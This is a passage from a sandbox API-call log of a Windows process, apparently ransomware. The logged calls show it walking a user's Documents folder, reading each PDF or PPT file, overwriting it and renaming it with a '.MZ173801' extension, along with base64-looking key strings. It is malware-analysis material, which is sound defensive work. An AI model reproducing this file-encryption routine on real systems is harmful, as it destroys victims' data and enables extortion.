lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.405] GetCurrentThreadId () returned 0x1358 [0122.405] GetCurrentThreadId () returned 0x1358 [0122.405] GetCurrentThreadId () returned 0x1358 [0122.405] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Ons82gm.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\ons82gm.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.405] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.405] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.405] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xd1aa [0122.405] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.405] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xd1aa, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0xd1aa, lpOverlapped=0x0) returned 1 [0122.406] CloseHandle (hObject=0x408) returned 1 [0122.407] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Ons82gm.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\ons82gm.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.408] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xd1aa, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xd1aa, lpOverlapped=0x0) returned 1 [0122.410] CloseHandle (hObject=0x408) returned 1 [0122.410] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Ons82gm.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\ons82gm.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Ons82gm.pdf.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\ons82gm.pdf.mz173801")) returned 1 [0122.411] GetCurrentThreadId () returned 0x1358 [0122.411] GetCurrentThreadId () returned 0x1358 [0122.411] GetCurrentThreadId () returned 0x1358 [0122.411] GetCurrentThreadId () returned 0x1358 [0122.411] GetCurrentThreadId () returned 0x1358 [0122.411] GetCurrentThreadId () returned 0x1358 [0122.411] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eafa8c0, ftCreationTime.dwHighDateTime=0x1d5ebf0, ftLastAccessTime.dwLowDateTime=0x7ba1e3a0, ftLastAccessTime.dwHighDateTime=0x1d5e2db, ftLastWriteTime.dwLowDateTime=0x7ba1e3a0, ftLastWriteTime.dwHighDateTime=0x1d5e2db, nFileSizeHigh=0x0, nFileSizeLow=0x11e2c, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="peBrvrQ9V.ots", cAlternateFileName="PEBRVR~1.OTS")) returned 1 [0122.411] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.411] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.411] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77152400, ftCreationTime.dwHighDateTime=0x1d5ea38, ftLastAccessTime.dwLowDateTime=0x68294140, ftLastAccessTime.dwHighDateTime=0x1d5ee31, ftLastWriteTime.dwLowDateTime=0x68294140, ftLastWriteTime.dwHighDateTime=0x1d5ee31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="PlN2", cAlternateFileName="")) returned 1 [0122.411] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf010a60, ftCreationTime.dwHighDateTime=0x1d5e9b0, ftLastAccessTime.dwLowDateTime=0xeff5be90, ftLastAccessTime.dwHighDateTime=0x1d5ef8b, ftLastWriteTime.dwLowDateTime=0xeff5be90, ftLastWriteTime.dwHighDateTime=0x1d5ef8b, nFileSizeHigh=0x0, nFileSizeLow=0xcb2b, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="tXqq.ppt", cAlternateFileName="")) returned 1 [0122.411] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.411] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.411] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\tXqq.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\txqq.ppt"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf010a60, ftCreationTime.dwHighDateTime=0x1d5e9b0, ftLastAccessTime.dwLowDateTime=0xeff5be90, ftLastAccessTime.dwHighDateTime=0x1d5ef8b, ftLastWriteTime.dwLowDateTime=0xeff5be90, ftLastWriteTime.dwHighDateTime=0x1d5ef8b, nFileSizeHigh=0x0, nFileSizeLow=0xcb2b)) returned 1 [0122.411] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.411] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.412] GetCurrentThreadId () returned 0x1358 [0122.412] GetCurrentThreadId () returned 0x1358 [0122.412] GetCurrentThreadId () returned 0x1358 [0122.412] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.412] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.413] GetCurrentThreadId () returned 0x1358 [0122.413] GetCurrentThreadId () returned 0x1358 [0122.413] GetCurrentThreadId () returned 0x1358 [0122.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\tXqq.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\txqq.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.413] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.413] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.413] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0xcb2b [0122.413] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.413] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xcb2b, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0xcb2b, lpOverlapped=0x0) returned 1 [0122.484] CloseHandle (hObject=0x408) returned 1 [0122.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\tXqq.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\txqq.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.486] WriteFile (in: hFile=0x408, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xcb2b, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f424*=0xcb2b, lpOverlapped=0x0) returned 1 [0122.487] CloseHandle (hObject=0x408) returned 1 [0122.487] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\tXqq.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\txqq.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\tXqq.ppt.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\txqq.ppt.mz173801")) returned 1 [0122.488] GetCurrentThreadId () returned 0x1358 [0122.488] GetCurrentThreadId () returned 0x1358 [0122.488] GetCurrentThreadId () returned 0x1358 [0122.488] GetCurrentThreadId () returned 0x1358 [0122.488] GetCurrentThreadId () returned 0x1358 [0122.488] GetCurrentThreadId () returned 0x1358 [0122.488] FindNextFileW (in: hFindFile=0xa1bc08, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf1e6e60, ftCreationTime.dwHighDateTime=0x1d5ea7c, ftLastAccessTime.dwLowDateTime=0xf1a07be0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0xf1a07be0, ftLastWriteTime.dwHighDateTime=0x1d5eedc, nFileSizeHigh=0x0, nFileSizeLow=0x52ad, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Vh7qZ.pdf", cAlternateFileName="")) returned 1 [0122.488] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.488] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.488] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\Vh7qZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\vh7qz.pdf"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf1e6e60, ftCreationTime.dwHighDateTime=0x1d5ea7c, ftLastAccessTime.dwLowDateTime=0xf1a07be0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0xf1a07be0, ftLastWriteTime.dwHighDateTime=0x1d5eedc, nFileSizeHigh=0x0, nFileSizeLow=0x52ad)) returned 1 [0122.489] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZ